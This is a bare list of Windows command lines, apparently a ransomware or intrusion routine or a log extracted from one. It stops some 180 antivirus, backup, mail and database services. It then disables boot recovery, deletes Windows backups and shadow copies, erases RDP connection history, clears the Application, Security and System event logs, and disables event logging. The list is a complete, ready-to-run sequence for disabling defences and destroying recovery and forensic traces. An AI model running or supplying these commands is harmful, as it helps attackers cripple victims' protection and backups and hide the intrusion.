"C:\Windows\system32\cmd.exe" /C net stop "Acronis VSS Provider" /y
"C:\Windows\system32\cmd.exe" /C net stop "Enterprise Client Service" /y
"C:\Windows\system32\cmd.exe" /C net stop "SQL Backups" /y
"C:\Windows\system32\cmd.exe" /C net stop "SQLsafe Backup Service" /y
"C:\Windows\system32\cmd.exe" /C net stop "SQLsafe Filter Service" /y
"C:\Windows\system32\cmd.exe" /C net stop "Sophos Agent" /y
"C:\Windows\system32\cmd.exe" /C net stop "Sophos AutoUpdate Service" /y
"C:\Windows\system32\cmd.exe" /C net stop "Sophos Clean Service" /y
"C:\Windows\system32\cmd.exe" /C net stop "Sophos Device Control Service" /y
"C:\Windows\system32\cmd.exe" /C net stop "Sophos File Scanner Service" /y
"C:\Windows\system32\cmd.exe" /C net stop "Sophos Health Service" /y
"C:\Windows\system32\cmd.exe" /C net stop "Sophos MCS Agent" /y
"C:\Windows\system32\cmd.exe" /C net stop "Sophos MCS Client" /y
"C:\Windows\system32\cmd.exe" /C net stop "Sophos Message Router" /y
"C:\Windows\system32\cmd.exe" /C net stop "Sophos Safestore Service" /y
"C:\Windows\system32\cmd.exe" /C net stop "Sophos System Protection Service" /y
"C:\Windows\system32\cmd.exe" /C net stop "Sophos Web Control Service" /y
"C:\Windows\system32\cmd.exe" /C net stop "Symantec System Recovery" /y
"C:\Windows\system32\cmd.exe" /C net stop "Veeam Backup Catalog Data Service" /y
"C:\Windows\system32\cmd.exe" /C net stop "Zoolz 2 Service" /y
"C:\Windows\system32\cmd.exe" /C net stop ARSM /y
"C:\Windows\system32\cmd.exe" /C net stop AVP /y
"C:\Windows\system32\cmd.exe" /C net stop AcrSch2Svc /y
"C:\Windows\system32\cmd.exe" /C net stop AcronisAgent /y
"C:\Windows\system32\cmd.exe" /C net stop Antivirus /y
"C:\Windows\system32\cmd.exe" /C net stop BackupExecAgentAccelerator /y
"C:\Windows\system32\cmd.exe" /C net stop BackupExecAgentBrowser /y
"C:\Windows\system32\cmd.exe" /C net stop BackupExecDeviceMediaService /y
"C:\Windows\system32\cmd.exe" /C net stop BackupExecJobEngine /y
"C:\Windows\system32\cmd.exe" /C net stop BackupExecManagementService /y
"C:\Windows\system32\cmd.exe" /C net stop BackupExecRPCService /y
"C:\Windows\system32\cmd.exe" /C net stop BackupExecVSSProvider /y
"C:\Windows\system32\cmd.exe" /C net stop DCAgent /y
"C:\Windows\system32\cmd.exe" /C net stop EPSecurityService /y
"C:\Windows\system32\cmd.exe" /C net stop EPUpdateService /y
"C:\Windows\system32\cmd.exe" /C net stop ESHASRV /y
"C:\Windows\system32\cmd.exe" /C net stop EhttpSrv /y
"C:\Windows\system32\cmd.exe" /C net stop EraserSvc11710 /y
"C:\Windows\system32\cmd.exe" /C net stop EsgShKernel /y
"C:\Windows\system32\cmd.exe" /C net stop FA_Scheduler /y
"C:\Windows\system32\cmd.exe" /C net stop IISAdmin /y
"C:\Windows\system32\cmd.exe" /C net stop IMAP4Svc /y
"C:\Windows\system32\cmd.exe" /C net stop KAVFS /y
"C:\Windows\system32\cmd.exe" /C net stop KAVFSGT /y
"C:\Windows\system32\cmd.exe" /C net stop MBAMService /y
"C:\Windows\system32\cmd.exe" /C net stop MBEndpointAgent /y
"C:\Windows\system32\cmd.exe" /C net stop MMS /y
"C:\Windows\system32\cmd.exe" /C net stop MSExchangeES /y
"C:\Windows\system32\cmd.exe" /C net stop MSExchangeIS /y
"C:\Windows\system32\cmd.exe" /C net stop MSExchangeMGMT /y
"C:\Windows\system32\cmd.exe" /C net stop MSExchangeMTA /y
"C:\Windows\system32\cmd.exe" /C net stop MSExchangeSA /y
"C:\Windows\system32\cmd.exe" /C net stop MSExchangeSRS /y
"C:\Windows\system32\cmd.exe" /C net stop MSOLAP$SQL_2008 /y
"C:\Windows\system32\cmd.exe" /C net stop MSOLAP$SYSTEM_BGC /y
"C:\Windows\system32\cmd.exe" /C net stop MSOLAP$TPS /y
"C:\Windows\system32\cmd.exe" /C net stop MSOLAP$TPSAMA /y
"C:\Windows\system32\cmd.exe" /C net stop MSSQL$BKUPEXEC /y
"C:\Windows\system32\cmd.exe" /C net stop MSSQL$ECWDB2 /y
"C:\Windows\system32\cmd.exe" /C net stop MSSQL$PRACTICEMGT /y
"C:\Windows\system32\cmd.exe" /C net stop MSSQL$PRACTTICEBGC /y
"C:\Windows\system32\cmd.exe" /C net stop MSSQL$PROD /y
"C:\Windows\system32\cmd.exe" /C net stop MSSQL$PROFXENGAGEMENT /y
"C:\Windows\system32\cmd.exe" /C net stop MSSQL$SBSMONITORING /y
"C:\Windows\system32\cmd.exe" /C net stop MSSQL$SHAREPOINT /y
"C:\Windows\system32\cmd.exe" /C net stop MSSQL$SOPHOS /y
"C:\Windows\system32\cmd.exe" /C net stop MSSQL$SQLEXPRESS /y
"C:\Windows\system32\cmd.exe" /C net stop MSSQL$SQL_2008 /y
"C:\Windows\system32\cmd.exe" /C net stop MSSQL$SYSTEM_BGC /y
"C:\Windows\system32\cmd.exe" /C net stop MSSQL$TPS /y
"C:\Windows\system32\cmd.exe" /C net stop MSSQL$TPSAMA /y
"C:\Windows\system32\cmd.exe" /C net stop MSSQL$VEEAMSQL2008R2 /y
"C:\Windows\system32\cmd.exe" /C net stop MSSQL$VEEAMSQL2012 /y
"C:\Windows\system32\cmd.exe" /C net stop MSSQLFDLauncher /y
"C:\Windows\system32\cmd.exe" /C net stop MSSQLFDLauncher$PROFXENGAGEMENT /y
"C:\Windows\system32\cmd.exe" /C net stop MSSQLFDLauncher$SBSMONITORING /y
"C:\Windows\system32\cmd.exe" /C net stop MSSQLFDLauncher$SHAREPOINT /y
"C:\Windows\system32\cmd.exe" /C net stop MSSQLFDLauncher$SQL_2008 /y
"C:\Windows\system32\cmd.exe" /C net stop MSSQLFDLauncher$SYSTEM_BGC /y
"C:\Windows\system32\cmd.exe" /C net stop MSSQLFDLauncher$TPS /y
"C:\Windows\system32\cmd.exe" /C net stop MSSQLFDLauncher$TPSAMA /y
"C:\Windows\system32\cmd.exe" /C net stop MSSQLSERVER /y
"C:\Windows\system32\cmd.exe" /C net stop MSSQLServerADHelper /y
"C:\Windows\system32\cmd.exe" /C net stop MSSQLServerADHelper100 /y
"C:\Windows\system32\cmd.exe" /C net stop MSSQLServerOLAPService /y
"C:\Windows\system32\cmd.exe" /C net stop McAfeeEngineService /y
"C:\Windows\system32\cmd.exe" /C net stop McAfeeFramework /y
"C:\Windows\system32\cmd.exe" /C net stop McAfeeFrameworkMcAfeeFramework /y
"C:\Windows\system32\cmd.exe" /C net stop McShield /y
"C:\Windows\system32\cmd.exe" /C net stop McTaskManager /y
"C:\Windows\system32\cmd.exe" /C net stop MsDtsServer /y
"C:\Windows\system32\cmd.exe" /C net stop MsDtsServer100 /y
"C:\Windows\system32\cmd.exe" /C net stop MsDtsServer110 /y
"C:\Windows\system32\cmd.exe" /C net stop MySQL57 /y
"C:\Windows\system32\cmd.exe" /C net stop MySQL80 /y
"C:\Windows\system32\cmd.exe" /C net stop NetMsmqActivator /y
"C:\Windows\system32\cmd.exe" /C net stop OracleClientCache80 /y
"C:\Windows\system32\cmd.exe" /C net stop PDVFSService /y
"C:\Windows\system32\cmd.exe" /C net stop POP3Svc /y
"C:\Windows\system32\cmd.exe" /C net stop ReportServer /y
"C:\Windows\system32\cmd.exe" /C net stop ReportServer$SQL_2008 /y
"C:\Windows\system32\cmd.exe" /C net stop ReportServer$SYSTEM_BGC /y
"C:\Windows\system32\cmd.exe" /C net stop ReportServer$TPS /y
"C:\Windows\system32\cmd.exe" /C net stop ReportServer$TPSAMA /y
"C:\Windows\system32\cmd.exe" /C net stop SAVAdminService /y
"C:\Windows\system32\cmd.exe" /C net stop SAVService /y
"C:\Windows\system32\cmd.exe" /C net stop SDRSVC /y
"C:\Windows\system32\cmd.exe" /C net stop SMTPSvc /y
"C:\Windows\system32\cmd.exe" /C net stop SNAC /y
"C:\Windows\system32\cmd.exe" /C net stop SQLAgent$BKUPEXEC /y
"C:\Windows\system32\cmd.exe" /C net stop SQLAgent$CITRIX_METAFRAME /y
"C:\Windows\system32\cmd.exe" /C net stop SQLAgent$CXDB /y
"C:\Windows\system32\cmd.exe" /C net stop SQLAgent$ECWDB2 /y
"C:\Windows\system32\cmd.exe" /C net stop SQLAgent$PRACTTICEBGC /y
"C:\Windows\system32\cmd.exe" /C net stop SQLAgent$PRACTTICEMGT /y
"C:\Windows\system32\cmd.exe" /C net stop SQLAgent$PROD /y
"C:\Windows\system32\cmd.exe" /C net stop SQLAgent$PROFXENGAGEMENT /y
"C:\Windows\system32\cmd.exe" /C net stop SQLAgent$SBSMONITORING /y
"C:\Windows\system32\cmd.exe" /C net stop SQLAgent$SHAREPOINT /y
"C:\Windows\system32\cmd.exe" /C net stop SQLAgent$SOPHOS /y
"C:\Windows\system32\cmd.exe" /C net stop SQLAgent$SQLEXPRESS /y
"C:\Windows\system32\cmd.exe" /C net stop SQLAgent$SQL_2008 /y
"C:\Windows\system32\cmd.exe" /C net stop SQLAgent$SYSTEM_BGC /y
"C:\Windows\system32\cmd.exe" /C net stop SQLAgent$TPS /y
"C:\Windows\system32\cmd.exe" /C net stop SQLAgent$TPSAMA /y
"C:\Windows\system32\cmd.exe" /C net stop SQLAgent$VEEAMSQL2008R2 /y
"C:\Windows\system32\cmd.exe" /C net stop SQLAgent$VEEAMSQL2012 /y
"C:\Windows\system32\cmd.exe" /C net stop SQLBrowser /y
"C:\Windows\system32\cmd.exe" /C net stop SQLSERVERAGENT /y
"C:\Windows\system32\cmd.exe" /C net stop SQLSafeOLRService /y
"C:\Windows\system32\cmd.exe" /C net stop SQLTELEMETRY /y
"C:\Windows\system32\cmd.exe" /C net stop SQLTELEMETRY$ECWDB2 /y
"C:\Windows\system32\cmd.exe" /C net stop SQLWriter /y
"C:\Windows\system32\cmd.exe" /C net stop SamSs /y
"C:\Windows\system32\cmd.exe" /C net stop SepMasterService /y
"C:\Windows\system32\cmd.exe" /C net stop ShMonitor /y
"C:\Windows\system32\cmd.exe" /C net stop SmcService /y
"C:\Windows\system32\cmd.exe" /C net stop Smcinst /y
"C:\Windows\system32\cmd.exe" /C net stop SntpService /y
"C:\Windows\system32\cmd.exe" /C net stop SstpSvc /y
"C:\Windows\system32\cmd.exe" /C net stop TmCCSF /y
"C:\Windows\system32\cmd.exe" /C net stop TrueKey /y
"C:\Windows\system32\cmd.exe" /C net stop TrueKeyScheduler /y
"C:\Windows\system32\cmd.exe" /C net stop TrueKeyServiceHelper /y
"C:\Windows\system32\cmd.exe" /C net stop UI0Detect /y
"C:\Windows\system32\cmd.exe" /C net stop VeeamBackupSvc /y
"C:\Windows\system32\cmd.exe" /C net stop VeeamBrokerSvc /y
"C:\Windows\system32\cmd.exe" /C net stop VeeamCatalogSvc /y
"C:\Windows\system32\cmd.exe" /C net stop VeeamCloudSvc /y
"C:\Windows\system32\cmd.exe" /C net stop VeeamDeploySvc /y
"C:\Windows\system32\cmd.exe" /C net stop VeeamDeploymentService /y
"C:\Windows\system32\cmd.exe" /C net stop VeeamEnterpriseManagerSvc /y
"C:\Windows\system32\cmd.exe" /C net stop VeeamHvIntegrationSvc /y
"C:\Windows\system32\cmd.exe" /C net stop VeeamMountSvc /y
"C:\Windows\system32\cmd.exe" /C net stop VeeamNFSSvc /y
"C:\Windows\system32\cmd.exe" /C net stop VeeamRESTSvc /y
"C:\Windows\system32\cmd.exe" /C net stop VeeamTransportSvc /y
"C:\Windows\system32\cmd.exe" /C net stop W3Svc /y
"C:\Windows\system32\cmd.exe" /C net stop WRSVC /y
"C:\Windows\system32\cmd.exe" /C net stop bedbg /y
"C:\Windows\system32\cmd.exe" /C net stop ekrn /y
"C:\Windows\system32\cmd.exe" /C net stop kavfsslp /y
"C:\Windows\system32\cmd.exe" /C net stop klnagent /y
"C:\Windows\system32\cmd.exe" /C net stop macmnsvc /y
"C:\Windows\system32\cmd.exe" /C net stop masvc /y
"C:\Windows\system32\cmd.exe" /C net stop mfefire /y
"C:\Windows\system32\cmd.exe" /C net stop mfemms /y
"C:\Windows\system32\cmd.exe" /C net stop mfevtp /y
"C:\Windows\system32\cmd.exe" /C net stop mozyprobackup /y
"C:\Windows\system32\cmd.exe" /C net stop msftesql$PROD /y
"C:\Windows\system32\cmd.exe" /C net stop ntrtscan /y
"C:\Windows\system32\cmd.exe" /C net stop sacsvr /y
"C:\Windows\system32\cmd.exe" /C net stop sophossps /y
"C:\Windows\system32\cmd.exe" /C net stop svcGenericHost /y
"C:\Windows\system32\cmd.exe" /C net stop swi_filter /y
"C:\Windows\system32\cmd.exe" /C net stop swi_service /y
"C:\Windows\system32\cmd.exe" /C net stop swi_update /y
"C:\Windows\system32\cmd.exe" /C net stop swi_update_64 /y
"C:\Windows\system32\cmd.exe" /C net stop tmlisten /y
"C:\Windows\system32\cmd.exe" /C net stop wbengine /y
"C:\Windows\system32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures
"C:\Windows\system32\cmd.exe" /C bcdedit /set {default} recoveryenabled no
"C:\Windows\system32\cmd.exe" /C wbadmin delete catalog -quiet
"C:\Windows\system32\cmd.exe" /C wbadmin delete systemstatebackup
"C:\Windows\system32\cmd.exe" /C wbadmin delete systemstatebackup -keepversions:0
"C:\Windows\system32\cmd.exe" /C wbadmin delete backup
"C:\Windows\system32\cmd.exe" /C wmic shadowcopy delete
"C:\Windows\system32\cmd.exe" /C vssadmin delete shadows /all /quiet
"C:\Windows\system32\cmd.exe" /C reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f
"C:\Windows\system32\cmd.exe" /C reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f
"C:\Windows\system32\cmd.exe" /C reg add "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers"
"C:\Windows\system32\cmd.exe" /C attrib "%userprofile%\documents\Default.rdp" -s -h
"C:\Windows\system32\cmd.exe" /C del "%userprofile%\documents\Default.rdp"
"C:\Windows\system32\cmd.exe" /C wevtutil.exe clear-log Application
"C:\Windows\system32\cmd.exe" /C wevtutil.exe clear-log Security
"C:\Windows\system32\cmd.exe" /C wevtutil.exe clear-log System
"C:\Windows\system32\cmd.exe" /C sc config eventlog start=disabled
"C:\Windows\system32\cmd.exe" /C net stop RESvc /y